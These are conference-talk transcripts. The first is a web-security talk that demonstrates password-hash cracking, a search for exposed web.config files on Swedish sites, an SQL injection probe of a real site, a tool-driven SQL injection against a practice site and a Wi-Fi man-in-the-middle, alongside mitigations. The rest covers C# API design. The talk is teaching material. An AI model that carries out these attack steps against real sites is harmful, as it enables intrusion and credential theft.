row, is a password. Not like an Oxford dictionary, just passwords people have used. And we're going to run this. Now what is happening is it is going through and rehashing with the salt and comparing it to the stored passwords. So it goes to the password dictionary, gets a password, takes one of the salts from the previous screen, adds it, hashes it, compares it to the cipher. What we can see going through here, if we break this little screen down a little bit, is we had our salts, which are over there. These are our hashes and these are the plain text passwords that it is cracking out of them. So we are cracking these passwords from the membership provider. And it is just flying through and it's finished. Oh wow, look at this. So the main thing here is that we just did 11,911 kilohashes per second. So we did about 12 million hashes per second on this tiny little old crusty laptop. When I run this on a modern graphics card, something like an AMD Radeon 7970: MD5, we can do about five billion hashes a second; SHA1, you can do about two billion hashes per second. The point is that you can recompute the hashing process so quickly you don't even need rainbow tables anymore. Talking to people that really, really, really know this stuff inside and out, they say rainbow tables are too hard, they're too big, we don't need them. So even when the passwords are not salted, when we don't have this randomness, GPUs have gotten so fast that if we can do billions of hashes a second, why don't we just hash your dictionary and see what matches up. So if you have the ASP.NET membership provider from 2010 or earlier, you have some work to do next week. Yeah. Yeah, good question.
So the question was the passwords there were all quite short. They're pretty simple passwords and how much faster would it be for larger passwords? So the reason why I've chosen these, first of all, these are all very common passwords, things like QWERTY. It's a crap password, we all know that, but it is extremely common. Because this is working through a password dictionary, and I'd open it but it's like a 220 meg file and this machine doesn't go too well, but because all it needs is a password dictionary that already has passwords in it, it doesn't really matter whether they're short or longer. It's not like going through every possible character range from 6 to 12, alpha numeric, you know, lower case. So it doesn't really matter what the range of characters is if it is in the password dictionary, it gets cracked just as fast as monkey or something like that. Now the question is, is it going to be in the password dictionary? So if you've created a long random password with say password manager, it's almost certainly not going to be in there. If you've tried to create something memorable, there's a good chance it will be. Okay, let's go on. Ooh, you guys. So before I came over, I was asking some people, what about Norwegian security? What about something a little bit topical? So why don't we see how you guys are going with security? So before I do this, what do you reckon? Is Norway good, security ones? Nobody wants to say yes. I think I heard one yes. I'm going to take it as a yes. So I started looking around for Norwegian sites. Now the problem I was having is that every time I found a Norwegian site, I couldn't see anything behind the ad. You guys have the hugest freaking ads, and yes I did actually measure it 63%. These are the most enormous ads I've ever seen. So it made things hard. What I decided to do is go through the Alexa Top 100 sites for Norway and start going through and looking for security risks. And in all honesty, you guys will love this, the security was actually pretty good. So I thought instead of breaking Norwegian sites, I'd show you some good practices from Norwegian sites and then we can look at how things should be done and then we'll find another country that's got crap security. Done our way. All right, so good example and these are just things that are immediately obvious security wise. So obviously HTTPS, it's got an extended validation certificate. That's the big green bit up the top. I can't pronounce what it says, but it is extended validation, which means that there's been a lot of due diligence that they've had to go through in order to demonstrate their identity, improve who they are to the certificate authority. The only thing I don't like about this is that padlock, that doesn't make it secure. A lot of people put bitmaps of padlocks right next to the logon, secure a logon because I've got a bitmap of a padlock. It doesn't work that way. You kind of need to see it up there in the address bar. So that was that one. So I looked at another logon and what you're seeing here is a very common, very basic test to see how the site responds to a possible cross site scripting attack. So I've just put in a script tag and I've tried to do alert XSS. If the site is vulnerable to cross site scripting, you get an alert box that appears on the page. If you don't, then it actually gets rendered. So we can see that it gets rendered to the screen. I can't pronounce what it says, but you can see it in text just down here. 
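What the site is presumably doing server-side (a hedged guess, since we only see the rendered output) is encoding the untrusted input before writing it into the page:

// Razor's @ syntax does this automatically; done by hand it looks like this.
string untrusted = Request.QueryString["q"];                 // e.g. <script>alert('XSS')</script>
string safe = System.Net.WebUtility.HtmlEncode(untrusted);
// safe is now &lt;script&gt;alert('XSS')&lt;/script&gt;, rendered as text and never executed.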
So what that means is things like the angle brackets have been encoded as ampersand less than and ampersand greater than and they're actually there in the HTML source. They haven't actually been rendered as a script tag. Another one here, basic SQL injection test. So can we change that URL from 479 to try and close off a statement and then add a condition and see if it behaves differently? What this has done is returned 404, so it's basically taken everything in that string and said it's not a valid ID, it doesn't match your record in the database. So that was good. So it was getting very hard on me to find a good site. Now this one, lots of response headers here, but there are three things that stood out to me in the response headers. Content security policy, talking about the things that the site can and can't do and the other sites that it can and can't do them to. Strict transport security, which is that fourth one from the bottom, we often call that HSTS. It means that once an HSTS header is set, if you go to a secure site and it responds like that, you can't then make an HTTP request. The browser has to honor that, which Chrome does, and Ancient Explorer doesn't, but it's a good header. And we've got a cross frame options header as well, and X frame options or XFO header of same origin, means you can't put this in a frame on any other website. You can put it in a frame on this website and that defends against clickjacking attacks. So that is actually rather good. So where else do we go for bad security? So I asked around and everyone said, you know what you should do? Does this look like they take security seriously? Not Abba, no. So that's not protection. Everyone said, everyone said you should do Sweden. And Sweden made it really, really easy. Now to kick me off, Nile sent me this. Now this is from Ikea in Norway, but it's like here at Swedish, so we're going to have a go at them anyway. And they sent this form when you went in your kitchen and they made it really, really easy for you to fill out these three things which I'm told are a username and an email address and password. And the irony of it is we're also worried about things like HTTPS and SSL and making sure we get our transport layer right. And these guys go, just write it down and hand it to the minimum wage guy at the desk. He'll fill it out for you. Now how many of these have the password of the person's Gmail account because they've reused it across everything? And they've got the Gmail account in the e-post. Is that email, e-post? Okay. Right, so very bad. So thank you Nile for that and for reconfirming the fact that clearly Sweden has issues. So because Sweden has issues, I thought we should do this. I take it as pleasant as people. I mean, that bad? I mean, it's not like the New Zealanders or anything other. It's the New Zealanders in the audience. All right, so here's what we're going to do. First one we're going to do is Swedish websites by FTP. Now in order to do this, we're going to need a web browser, two Google searches and an Allen key. Now, do not use the left-handed Allen keys. Do you get a proper right-handed Allen key? Okay. Now let's be serious and hack some Swedish websites. So here's what we're going to do. Swedish website. Now what we're going to do is just a really simple Google search and it's probably going to order completely for me. So we're going to do a search for in URL FTP. So did you know that Google indexes things over FTP? It's true, they do. It's not just HTTP. 
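Before the FTP search continues, one reference point: those three response headers can be added from application code in ASP.NET. A minimal sketch; the values are illustrative and need tuning per site:

// Global.asax
protected void Application_BeginRequest(object sender, EventArgs e)
{
    if (Request.IsSecureConnection)                        // HSTS is only meaningful over HTTPS
        Response.AppendHeader("Strict-Transport-Security", "max-age=31536000");
    Response.AppendHeader("X-Frame-Options", "SAMEORIGIN");                  // anti-clickjacking
    Response.AppendHeader("Content-Security-Policy", "default-src 'self'");  // illustrative policy
}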
We're going to look for web.config in the URL. Everyone know what a web.config is? It's the configuration file with all your secrets for your ASP.NET app. And just to be sure that we only get configs, we're going to make sure the file type is config and we're going to do a search. And we've just found 7,390 websites that have exposed FTP. Exposed web.config over FTP. But that's no good because we only want Swedish sites. So let's filter that. So let's go down to in URL, so we make sure that we only get Swedish ones. So there are Swedish websites. Now, if it wasn't a recording, I could click on this. But if you were to click on that, don't click on that, and if you did, it wasn't my fault. If you click on that, you will get web.configs that probably have connection strings, user names, passwords, database names. You'll probably get API keys. You could probably take web.config off the path, go back to the root and find the folder called secret or private or things like that which you aren't meant to see, but because you've got anonymous FTP access, you can get it. Probably find database backups; probably find source control, which is often something that gets published, believe it or not. You can do just about anything. The other thing is, it's obviously anonymous FTP. Is it anonymous read only or anonymous write? Possibly you could even deface them. I don't know. I don't click these things. That's way number one of hacking Swedish websites. Way number two of hacking Swedish websites: SQL injection. We're going to need for this: one Google browser, one Google search, one Havij, one Allen key. Everything in Sweden is an Allen key. Now, who here has an understanding of SQL injection? A quarter. Okay. Roughly. So let's do a bit of SQL injection 101. So this is how SQL injection works. Now, let's imagine we have a URL that looks like this. Very common looking URL. Very semantic. I would like product number three. We have two parts here. We have a resource, which is clearly the URL and the path. And then on the right hand side, we have the query string. That inevitably translates down to a SQL statement that looks something like this. And we have two parts again. So we have the query and we have the parameter. Pretty basic how-to-build-a-web-app 101. Now, the thing about this is that everything on the left hand side is trusted. It's trusted insofar as we built it, we own it, we run it, we support it. It's in our system. Everything on the right hand side is untrusted. And when I say untrusted, I mean it is coming from an externality, from an external source. It's going to be the query string in this case. It could be form data, so post data. We saw that earlier with Qantas, untrusted form data. It could be request headers. The user agent is untrusted data. You can change the user agent and reissue the request. So what we're going to do is look for Swedish websites that we can SQL inject. So let's go back to the browser. We'll do another Google search. And let's just drop down to SE like that. Now, there's a very common pattern that often indicates that you have a SQL injection risk. If you have classic ASP, you probably have a SQL injection risk. If you saw my talk on Wednesday, we looked at Bell. And I said Bell was running classic ASP, so almost certainly they have a SQL injection risk. And Bell obviously did, because all their data got put on Pastebin and they had a big problem. But let's have a look at this guy. Bad Taste Records. It's all in English, but apparently it is Swedish, so I reckon it's fair game.
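For reference before the demo: the standard defence against this is to keep that untrusted right-hand side out of the query text entirely and pass it as a typed parameter. A minimal sketch; the table and column names are made up, and it is shown with System.Data.SqlClient, though the same idea applies to any provider:

// using System.Data; using System.Data.SqlClient;
using (var connection = new SqlConnection(connectionString))
using (var command = new SqlCommand("SELECT * FROM Bands WHERE Id = @id", connection))
{
    // The untrusted value travels as data, never as part of the SQL string.
    command.Parameters.Add("@id", SqlDbType.Int).Value = int.Parse(idFromQueryString);
    connection.Open();
    using (var reader = command.ExecuteReader())
    {
        // read the matching record...
    }
}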
All right, so we look at the URL. Now, we can add one character to this URL and determine if there is a SQL injection risk. So any guesses? If we had one character. Single quote. Single quote might do it. I'm going to go with one that I know works. It's not hacking, it's only one character. Okay. So what are we seeing here? We're seeing one character. We're seeing one character which has caused an internal exception. The internal exception has bubbled up as a Microsoft OLE DB provider exception. Somewhere under here we have MySQL, which has tried to run a query that hasn't worked. And inevitably what's happened is it was expecting to get an integer as the value of ID and then it would pull the record from the database. Now, we've changed that integer into a string. So effectively it's probably written a query that goes something like select star from bands where ID equals 3X2. So MySQL has gone and done an equivalency of actually thinking that it needs to find another column called 3X2. And it's told us that there is no column. So it's telling us that it's bubbling up internal exceptions. Now, who has never mounted a SQL injection attack? What? Everyone has? Come on. Who has never mounted a SQL injection attack? Anyone here? Do you want to come here? We don't do enough interactive stuff in these shows. What's your name? Jeff. Get out, Jeff. Troy. Come over here, mate. All right. So everyone, please note for the record, Jeff is now hacking. No, don't go away. You are. But just to be safe, we're not going to hack this website. We're going to hack another website. So I've created another website over here called Supercar Showdown. Now, I created this for a Pluralsight course called Hack Yourself First. It's got about 50 vulnerabilities in it. If you want to hack, go to hackyourselffirst.troyhunt.com and go nuts, after Jeff, not before Jeff, because otherwise the demo is not going to be real good. All right. So what we're going to do, so you really are driving, Jeff, do you want to just scroll down a little bit on the page? All right. So we've got three different manufacturers here. Just click on the view link for one of those. So pick one you like. Good choice. Now we look at the URL. So that is a suspicious looking URL. So let's copy it onto the clipboard. Okay. Good. Now we're going to open Havij. So see the little carrot down on the taskbar. Okay, open that. All right. Now let's just maximize that because we're going to get a bit of data if this all works. All right. Now let's paste that into the target. Now you can go and get Havij for free from itsecteam.com. You've done this before. You know where to go. Analyze. So basically what's going to happen here is Havij is going away making HTTP requests to this website, and it's making them in such a way that it's trying to cause exceptions in the database, so that when the exception is exposed, like we saw before with our Swedish mates, it's going to disclose information. And it's already told us that the database name is hackyourselffirst underscore DB. This is an Azure website with SQL Azure behind it. There's nothing wrong with Azure. It's just a crappy web app. Now we know what the database is, but that's not good enough. Let's get the tables. So go to the tables button. Okay. And let's click on get tables. Very good. Okay. So this is going away making more and more and more HTTP requests. Okay. Now let's, what looks good, Jeff? What do we want, mate? Let's go with membership.
Well, tell you what, let's get in a user profile. Good choice. That was my second choice. All right. Now let's get the columns. Okay. So we're going to get the columns. It's always nice we can do this with a GUI, isn't it? All right. Now what should we get? What data do we want, mate? Password. Yeah. Password would be good. We're going to need something else though if we want to hack this. Yeah. Let's get email. Good idea, Jeff. All right. Let's get the data. Oh. Oh. Round of applause for Jeff. Well done, mate. Look at that. Thanks, mate. And that's how SQL injection is done. So the other day I was saying SQL injection is such a risk. And it's number one in the OWAS top 10. It's number one in just about every sort of risk assessment thing you see. The reason it's such a risk is that it is so easy to exploit. So we did one Google search. First result, clearly we didn't go and hack that Swedish website exactly. But I imagine if somebody was to hypothetically do this, they would get the same sort of data because it is so easy. And this is why you're seeing kids with mums who have pissed off taking them to court because they've just SQL injected some website. That's how it happens. Okay. Let's do one more. All right. So let's have a go at Swedish websites with insufficient SSL. Now this is a really fun one. So what are we going to need? One Google browser, one Wi-Fi pineapple. Okay. Okay. Now, here's what we're going to do. We're going to pick a site and we're going to pick a Swedish site called expe-es-s-d-n dot s-e. Let's have a look at the Swedish website. Now, I did go through and have a look at sort of the same Alexa top 50 or 100 or whatever it was Swedish websites in order to find one that would meet my needs. And this one, which is going to appear any moment now, is the one that I chose to use. It's number five in the Alexa top 100. Oh, man. Holy shit. Okay. Norway's off the hook. I haven't seen that before. All right. Okay. So this is a legitimate website. We're loading it real time. Does that say something funny that I don't understand? Okay. Now, we can log it in. Now, is this a secure login? Why not? Ah, but, but, but. Let's inspect the form. Inspect element. Oh, oh, oh, oh, oh. Let's close Fidler and reload this page. Damn it. Let's try this again. Rewind. Let's log it in. Inspect this element. I hate it when I do this. All right. So if we have a look at the form URL, it posts to HTTPS. So it's secure, right? Because when it posts to HTTPS, it's going to encrypt the credentials when they get sent to the server. All right? Yes, it is. No, it really is. If we post this form, it will encrypt the credentials when they go to the server. Now, here's the interesting thing though. When we load this page, it's not loaded securely, which means that if you can get in the middle of the communication and you can manipulate the contents of the page, you can change what's going to happen here. And it begs the question, how do you get in the middle of the communication? And that's why I got this little guy just here. So I'm going to take this. This is the Wi-Fi pineapple. This was in the instructions next to the Allen key. So this little guy is a wireless access point. And in fact, it does a couple of things. So it's a wireless access point that you can stand up just like any other wireless access point. And I have stood this wireless access point up and given it an SSID of free NSA Wi-Fi. 
Now, I'm guessing that there are a lot of people who have seen free Wi-Fi and not seen NSA and gone, okay, let's jump onto it. The other thing it can do, though, is it has a little feature where it can look for what we call probe requests from your devices. Now, what a probe request is, is when you connect to a known network and you say, remember this, so that when I come home later on, I can automatically connect to the network, what's happening is your phone walks around continually blasting out, probing for that network. Now, what it means is that the pineapple can see that and it can turn around and it can change its SSID to the one that you're looking for. And then your phone says, well, let's get it on and we'll connect and we're all good if there's no encryption on that network. So what I can do now is I can go to the Wi-Fi pineapple interface. And this is a nice, this hacking tools are getting so good because they've got GUIs and it's all friendly and no green screens. And if we still have a connection, we can go into Karma, which is hopefully going to load the data from our Wi-Fi pineapple, which it is not. Well, in doing this, anyone in this vicinity have a look at your network and see if you are seeing networks that you know, okay, which would be the really, really interesting thing, or free NSA Wi-Fi. Well, there we go. It's back. Now, one of the problems is when I do this at geek conferences and there are so many freaking Wi-Fi devices, the whole thing, it's loading honestly. The whole thing just gets a little bit overwhelmed. So let's see if we can go into the Karma log. Otherwise, you know what, it's working, but there is so much data in here. Let's try and remove the duplicates. Let's try and apply the filter. It is massive. So what I'm going to do is I'm going to try and grab one of my shortcuts. Just look at all my secret demo bits and I'm going to try and grab the log path. So basically, it's just building up a file on the system with all the log data. And I don't think it's actually going to load, but what we normally see is all the network names that are being probed for. So I can actually give you an example from my room earlier on because I ran a little demo of this just to make sure everything would work and I took pineapple images. And this is the sort of thing that we normally see. So this was in my room and what we're seeing here is my iPad and my iPhone and we can actually see that my iPad I deliberately connected through to free NSA Wi-Fi because I wanted to test it. Often I see a lot of other people connect to free NSA Wi-Fi because they want free Wi-Fi. My iPhone connected to an SSID called Radisson Guest. This is not Radisson Guest, but because my iPhone was saying where is Radisson Guest, which is an open network, the pineapple responded. Now, I don't know who Amy is. Maybe I should have removed her name. But Amy's iPad connected to GitHub Secret. So she was probably near me, so sorry Amy if you're in the room, and GitHub calling it Secret doesn't make it so. So it actually broadcast that name back out. Now if anyone is actually connected to the device and they just simply overwhelming things, what's happening is you're connected to the device and then it routes the traffic through the ethernet cable into this machine and then out over the normal Wi-Fi. So effectively this machine and the pineapple can man in the middle of the connection. Now if I try this again, I'm just going to open Fiddler because I can replicate the behavior when I have Fiddler open. 
If I try this again and we reload this page this time, see, it was the little bit that I was hiding just before, and we go back to the form, and we go into here and we inspect the element, and we go to here. Okay, so we're seeing a different URL here. Okay, we're posting to a different URL. Now the way the pineapple does it is that you load this form and effectively your device is now going through this malicious network, and this form makes a request for a JavaScript file from an HTTP address, and because it's an HTTP address and it's not a secure connection, we can do things to it. We can do things like, instead of actually returning the JavaScript file from that source, I can serve one up from the pineapple. So the pineapple, with its little built-in web server, has served up its own JavaScript file, and that JavaScript file has rewritten the DOM, and that's why we're seeing that this now posts to a different URL. So if I go in here, what's a good Swedish name? Sven. I like that. Bork, bork. And I fill in other details and I submit it and the internet works. Hopefully. Of course we know where it's going to go, and the point is that we can actually redirect where that form posts to because the form was loaded insecurely. Now that is actually going to post to the same website. It should look like that. Yeah. All right, so what normally happens is this page loads, the email address is there, the password is there, because we've changed the form action so we've actually sent it off to another URL. Now the point of all this is that it comes back to: any part of the connection which is not secure can be compromised. It can't just be read, it can be manipulated. So what that means for login forms is you've got to load the login form over HTTPS. If ever you see a login form and you don't see a padlock, and I showed one a couple of days ago for GoDaddy, login form, no padlock, the connection can be compromised. And we've seen this happen in cases before. We've seen things like the Tunisian government compromising people's connections back when Facebook wasn't loading the login page over HTTPS. So ultimately that's what anyone with a compromised device should be seeing. There are too many of you, you have over-compromised my pineapple. But you should hopefully still see those SSIDs there. And that was the slide which should have gone first. Home is where your Wi-Fi connects automatically. That is the risk of open Wi-Fi and that is the risk of not having HTTPS in your connection. And with that, I'm done. Thank you. So I think we've got a few minutes for questions. If anyone has any questions? Any questions at all? There's one over there. So the problem with the salting and the hashing is it's just one round of SHA1. And effectively the problem is it's too fast. So in the newer versions of the membership provider you've got a thousand rounds. So it is now 1,000 times slower to do the same thing. And a lot of people say that's not fast enough, or rather that's not slow enough. It should be 5,000 or 10,000. So really the lesson there is don't use the old membership provider. Use the current one and preferably use something even stronger again. Other questions? Over there. Sorry? What is something stronger again? So first of all, from an algorithm perspective there are things like bcrypt or scrypt. The other option is to increase the iteration count.
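For what increasing the iterations looks like in code: .NET ships a PBKDF2 implementation, Rfc2898DeriveBytes, which generates a salt and repeats the work many times. A rough sketch; the iteration count is illustrative, pick the highest your hardware tolerates:

// 32-byte salt, 10,000 iterations of the underlying keyed hash
using (var pbkdf2 = new Rfc2898DeriveBytes(password, 32, 10000))
{
    byte[] salt = pbkdf2.Salt;
    byte[] hash = pbkdf2.GetBytes(20);      // 20-byte derived key
    // Store the salt, the hash and the iteration count so the count can be raised later.
}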
So instead of a thousand rounds of SHA256, I think it is, you increase it, which unfortunately you can't do in a configurable way in ASP.NET. But you can go and look at things like Brock Allen's MembershipReboot, which gives you more configurability. There are a few others out there as well that allow you to effectively increase the workload of hashing a password, because that's what you want to do. You don't want it to be too fast, otherwise stuff like that happens. Anyone else? Over there? It could. I guess the issue there, so the question was, can the browser be a little bit smarter and actually tell you where it's going to send the credentials to. The problem is, I guess from a consumer perspective, how are they going to deal with that? Particularly when you just see a URL somewhere, you know, do you want mum and dad seeing it's going to go off to blah blah blah secure dot so-on-and-so-forth? So it's probably a little bit tricky usability-wise. The other thing is, in the Facebook example I gave before, when they compromised the login page they still posted to Facebook, but they made an asynchronous parallel request sending the credentials off to another URL. So the post path was still correct but it was still stealing passwords. No? Yeah, but it doesn't, so now the question is, doesn't it tell you if you're going to post credentials to an insecure path? But here it's still posting to a secure path. Yeah, well, that's the other issue. If you give people security prompts saying do you want to do this or not, they always say yes. It's hard to give people security prompts and have them make informed decisions. Anyone else? Okay, no more. Alright, well thank you very much everyone.
|
Have you heard? Apparently we’ve created a dreadfully insecure internet with vulnerabilities reaching so far and so wide that literally anything is obtainable online through covert methods. Often this involves the now very well-known yet frequently present classic exploits – SQL injection, cross site scripting and others – but now we’re also seeing new attacks against security defences such as two factor authentication. In this session I’ll take you through how the risks we, as developers, are building into web sites and APIs can be easily exploited to gain access to everything from credit cards to credentials to control of commercial facilities. For many people, they’ll be stunned at the simplicity of the risks that continue to be exploited whilst for others, risks they never knew existed will be exposed, decomposed and most importantly, the mitigation will be shown. This session recreates real world examples of attacks against airlines, ticketing systems, hotels and transportation services – enough that someone literally could hack themselves all the way around the world to Norway. It’s not a theoretical exercise; these are real world attacks by real world hackers laid bare.
|
10.5446/50873 (DOI)
|
Good afternoon, everyone, and welcome to the last talk of the last day of the conference. It's Friday afternoon, so I appreciate you coming here, and today we're going to talk about some aspects of API design. My name is Vagif. I work for the Norwegian company Miles. I'm originally from Russia, but I've been living in Norway for over two decades. You can find me on Twitter. You can mail me if you have any questions. And if you find what I'm going to talk about interesting, please check out the GitHub repository, which contains everything I will show you plus some extras. So our focus this hour is some aspects of API design in modern times. Who was at James Newton-King's session about API design yesterday? Okay, it looks like I was the only one. Okay, that was a great session focusing on how you design an API in a way that developers feel at home, like they feel familiar with the way they are used to working. James also recommended a book which has become a classical book from 2008, Framework Design Guidelines. But looking at this book today, I find that some of the recommendations have to be taken with care. For example, just to give you an example, it recommends the use of lazy values. You have something like GetSchema, and then if you have a property Schema, it's a lazy property which is just read on demand. But with modern APIs, if you are careful about asynchronous calls, then you have to be very explicit about what and how you fetch. So actually lazy doesn't play very well with asynchronicity. And there are other aspects of that. So modern-times API design comes with some additional precautions to make it both consistent and flexible. And this is not easy. It used to be much easier 10 years ago. If you had to choose a framework and main programming language for development 10 years ago, and if it was C# and .NET, then it had to be object-oriented programming with class hierarchies and interfaces and, of course, strong types. So it was a relatively narrow window of opportunities compared to modern times. And nowadays, when people write mission-critical back end systems in JavaScript, of course this can't go unnoticed on traditional platforms. So even if you are doing enterprise development in C# and .NET, you will be influenced by that. And it's not just a conflict of generations, where the father has been doing J2EE enterprise programming all his life and the son is hanging out with some Ruby youngsters. The choice is more complicated and maybe more confusing, because this is happening to the same language, to the same platform which is traditional, in a way, for us. First C# was extended with elements of functional programming, and it happened around 2007. It was driven by LINQ development, and it spawned such innovations as lambda expressions and extension methods; all these fit very nicely in the functional paradigm. And it didn't actually create a kind of conflict with traditional development. It came as a nice complement. But what happened in 2010, when the language and platform were extended with the so-called DLR, the dynamic language runtime, in many scenarios, well at least some scenarios, created some alternatives to the traditional way of doing statically bound class resolution. So suddenly we could start writing code and the compiler didn't take any responsibility for how this code would be resolved. So suddenly it was possible to write absurdly looking code. As long as you wrote the word dynamic, the compiler kind of washed its hands. So that affected not just properties and methods.
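The slide isn't reproduced in the transcript, but the kind of code being described looks roughly like this; it compiles because all binding on dynamic is deferred, and it only blows up when it runs:

dynamic value = "hello";
var result = value * 42;    // compiles fine: the compiler has washed its hands
// At runtime: RuntimeBinderException, operator '*' cannot be applied to string and int.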
As you can see here, you can mix apples and oranges. You can multiply grids by integers, and as long as there is a dynamic object in the operation, the compiler doesn't care. So needless to say, that was met with some skepticism by some developers. And in the first examples that Microsoft published on MSDN, the documentation website, there were rather minor improvements. Like here, you can get rid of the typecast when it comes to COM interop. And you can say that this second example is nice looking because you don't have the typecast. But some developers would argue that the code is also deceiving, because it actually looks like statically compiled code but actually it is not. But soon developers brought more radical changes to all that, and they started using dynamic programming to gain greater achievements. So if you look now at how the dynamic library Simple.Data is used, you can see that the whole API looks like it's written specifically for our domain. You have a database object with a property Users, with a method FindAllByEmail. And of course there is no such property, there is no such method. So what Simple.Data does is that it talks to the database and it pretends that there are such methods and properties, as long as there is a Users table in the database and there is an Email column in such a table, and the rest is just conventions. And it's also smart enough to convert the result back to a User entity. But you didn't actually have to declare the entity DTO, because you could just send back a dynamic object as long as the client would accept it. And this example here demonstrates even more radical code saving, not just saving on DTOs and some proxy-generated classes. Everyone working with acceptance test development in .NET, or BDD, will of course recognize this Gherkin language, and underneath is a so-called step implementation using SpecFlow. But these two lines can replace maybe 50 or 100 lines of boilerplate code. Because if you had to write this code yourself, you would start parsing this table and extracting values, and then you have some DTO and you put the values there, then you have a data access layer and maybe another DTO, you have to have an adapter, maybe use AutoMapper, and so on. So it's not creative work. Here, two lines of code actually taken from two different libraries; the first one is SpecFlow.Assist.Dynamic and the other one, again, is Simple.Data, and they interoperate nicely. So obviously there is a great code saving, and that was convincing enough for dynamic libraries to stay in the static code world. So the popularity of dynamic libraries is growing, and you can see just some examples from various areas, some very successful examples: SignalR, Nancy, Simple.Data; there are other database micro-ORMs like Massive, for example; EasyHttp. You see they cover different areas and they really save us on code typing. So I'm not going to answer the question of whether you should use dynamic libraries, because this talk is about a different thing. We are putting on the hat of the API designer and trying to answer a different question: how to actually reach out to a wide group of developers, where some of them may prefer a dynamic API and some of them prefer a static API, and right now you basically have to choose. If you like to consume database classes using a dynamic API, it must be Massive, Simple.Data or something similar; otherwise it will be something entirely different. But our focus is to expose a single API in a hybrid way, so you can write both dynamic and statically typed clients which will talk to the same operation set.
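For readers following along without the slides, the Simple.Data call described above looks roughly like this; Users and FindAllByEmail are resolved at runtime from the table and column names, nothing is declared in code:

var db = Database.Open();                    // Simple.Data entry point, returns a dynamic object
List<User> users = db.Users
                     .FindAllByEmail("someone@example.com")
                     .ToList<User>();        // converting back to a POCO is optional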
And we will also look at how it's best to package this API, because what we are going to show is actually a cross-platform library which can work even on iOS and Android devices using Xamarin tools, and not all platforms support dynamic: Silverlight 4 doesn't support it, Windows Phone 7 doesn't support it, and iOS only has experimental dynamic support, which in practice means it's not supported. I tried that. So you have to be selective. So how can we package it in a way that it can be deployed smartly? Having said all that, just on a side note, the choice of using dynamic typing in your C# code depends, ironically, maybe not on external interoperability, because dynamic C# is very good for implementing interoperability with external services. But, ironically again, the internal interop with statically typed C# is not always smooth. Just to give you a simple example: if you consume a lot of data using dynamic C# in collections, you would expect to be able to use LINQ operations. But LINQ operations like Single, FirstOrDefault, Count, they all come as extension methods, and extension methods are resolved at compile time, which means they can't be applied to dynamic objects. It will result in a runtime exception. So you will have to explicitly cast to IEnumerable of dynamic, for example. So if you have a lot of such internal integration points, they can become a pain point. So bear this in mind. But if you properly arrange where dynamic blocks can be used, you will have great code savings, as we saw in a few examples. So we'll use database access as our main domain, because this is something that everyone understands. So this is database access code written using LINQ, using a fluent API. And this can alternatively be written using a dynamic API, where we have methods like FindByCompanyName and select CompanyName and Year. So we will simulate the domain's ubiquitous language, in a way, or domain entities at least. The alternative to that is that we actually expose the same operation set. So if we talk about database access, there will be Where, Select, OrderBy and so on. And we will differentiate inside these operations by implementing several overloads, so that both dynamic and static clients will work.
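On that interop pain point, in practice it looks like this (a small sketch; the rows variable is hypothetical):

dynamic rows = db.Users.All();                       // some dynamically typed result set
// var first = rows.First();                         // compiles, then throws at runtime:
//                                                   // LINQ's First() is an extension method,
//                                                   // and extension methods are bound at compile time.
var first = ((IEnumerable<dynamic>)rows).First();    // the explicit cast brings LINQ back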
You just write directly dynamic expressions, but you need to define this expression object somewhere. And it can be just once for the whole application because this is not real storage. You will never need to persist it. This is just used to send to methods and convert, do some conversion. So this is our approach, exposing single API that can be consumed in that way. One question which I already received is what about the extra cost? Do you need to implement a lot of stuff if you do it that way? So this talk is actually based on real world project. There is an open source library called simple data client that is hybrid API. It's portable cost library, which supports both dynamic and static calls. The dynamic wrapper, it took six classes and 59 lines of code. When I was working on this talk, on examples for this talk, I actually did more, did better support for this in the dynamic wrapper. So it took me 76 lines of code. But what I'm trying to say is that the overhead is pretty much fixed. You just implement some magic in your dynamic wrapper and that will be the same number of lines of code almost no matter what the cell you are exposing. There may be some variations, but the core part is the same. So there is no dual implementation. There is no re-implementation. You will never repeat yourself when working with these libraries. So this is our strategy for a hybrid API. What we are going to do is we will package our domain logic in statically type library and we will expose just statically accessed methods. We will use link expressions because it gives your DSL very good expressiveness. And this link expression we will parse and store in some custom expression. Then we will add a small wrapper, which will be dynamic wrapper, where we will subclass our custom expression. So our dynamic calls will be sending this subclass instance of expression, which will be converted into the custom statically type expression and the actual execution is fully statically typed. So just to give an example of simplified example of implementation and packaging. So you have some library finder DLL, which will work on all platforms supporting modern.NET, which will have interface I finder and there will be two overloads. Find which takes link expressions and find takes this custom expression, that's called query expression. Users will never have to think about this overload. They will never relate themselves to some explicit choice of this. It will just happen to them. But the second overload will actually be used by dynamic wrapper that will send their subclass version of this query expression. So this is how it will work. And then the client code might look like this. So in statically typed client we instantiate our finder and we send link expression to it. And by the way, our link expression parser, it's pretty much how it works also for real world link expression parser. So actually it's not very long way to go from that implementation to have link provider. Of course you will have to implement things like Iquare about deferred query execution, but the actual tree parsing is there. And then dynamic client looks similar. Again, you just need to declare dynamic query expression and you can send it around using almost the same syntax and it will be converted to the same link expression. So plan for the rest of the talk is go through the case study. We are going to work with SQL commands, which of course everyone understands what it is. 
As I mentioned earlier, the implementation is just an extracted part of the open source project with a changed domain area, because the OData protocol is not something that everybody is fluent in. And we will incrementally grow our implementation until we see it works well for a static client, a dynamic client and even a mobile client. So our case study is a hybrid SQL command builder. As you probably have understood, we will be writing something like a LINQ provider. And these are traditional LINQ statements using the two different syntaxes supported by the C# compiler; we will focus on the second one, the fluent syntax. And this is the supported subset of SQL commands. It will of course be a shorter, smaller subset than real SQL. There will be no join, but there are no principal difficulties in implementing stuff like join. It just requires more work, but the design part is the same. Just to give you a quick idea of the scope of our work: if we were dealing with hard-coded strings, our untyped version of the command builder might look like this. This is an interface that takes some magic strings, which nobody likes, chains them, and then we call Build. And in this Build operation, all the strings are connected together and we build the final command. And the command class will have, again, string fields for tables, for the condition, for the selection, and for the order-by columns. And actually building the command is really simple, and anyone would probably implement it in a quarter of an hour, because, you see, that's the whole code. It's just string concatenation and list concatenation, so we will get this subset of supported SQL commands. So, moving on to the typed version. Now we need a CommandBuilder of T. And in order to get a CommandBuilder of T, we'll need to inject T somewhere. So we'll have two interfaces. The first one is the non-generic one, where we will be sending the actual T, which may be Companies or Persons, our entity set or entity class. And this non-generic command builder will give us the generic one. And from there, we can send generic LINQ expressions. So this is a typical usage example. We instantiate a command builder, and then we write From Companies. At that point we're getting the typed version of the command builder. So we continue then with x, which is an x of Companies. So we can choose any properties of x of Companies, and everything will be statically compiled. So if you write something that doesn't make sense, we will get a compiler error. That brings us to LINQ expression trees, and this slide lists the number of LINQ expression tree node types, which is exactly 84. And of course it raises the question: do we really want to do that? Who has worked with parsing LINQ expressions? Well, I have full understanding for that, 